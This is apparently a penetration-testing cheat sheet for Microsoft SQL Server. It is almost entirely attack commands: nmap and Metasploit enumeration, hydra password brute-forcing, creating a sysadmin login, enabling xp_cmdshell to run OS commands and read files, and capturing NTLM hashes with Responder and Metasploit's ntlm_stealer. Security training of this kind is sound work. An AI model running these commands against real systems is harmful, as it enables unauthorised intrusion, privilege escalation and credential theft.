
MSSQL (Microsoft SQL) Pentesting

MSSQL is a relational database management system. The default port is 1433.

nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>

# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

hydra -L usernames.txt -p password <target-ip> mssql
hydra -l username -P passwords.txt <target-ip> mssql

# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database

# Get all users
> SELECT * FROM sys.database_principals

# Switch to the database
> USE <database>

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>

# Get the version of MSSQL
> SELECT @@version

# Check whether the current user has permission to execute OS commands
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# Get current username
> SELECT user_name()

If we connected to MSSQL using impacket, we can execute Windows shell commands after running "enable_xp_cmdshell".

> enable_xp_cmdshell
> disable_xp_cmdshell

We can then execute commands exactly as in the Windows Command Prompt.

# Get current user
> xp_cmdshell whoami

# Show files and directories
> xp_cmdshell dir
> xp_cmdshell dir \Users
# Show hidden files
> xp_cmdshell dir /a

# Get current directory
> xp_cmdshell cd

# Get contents of file
> xp_cmdshell more \Users\Administrator\example.txt
> xp_cmdshell type \Users\Administrator\example.txt

msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler

MSSQL uses Kerberos to authenticate users, so we can retrieve the NTLM hash.

First we need to start Responder and an SMB server, each in its own terminal.

# In terminal 1
sudo responder -I <interface>

# In terminal 2
sudo impacket-smbserver share ./ -smb2support

# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

In msfconsole, select the following module.

We need to set the "SMBPROXY" option to the Responder IP (this IP is displayed in the terminal when Responder starts).

msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
msf> set smbproxy <responder_ip>
msf> run

When the module runs, the NTLM hash appears in the terminal where the SMB server is running.
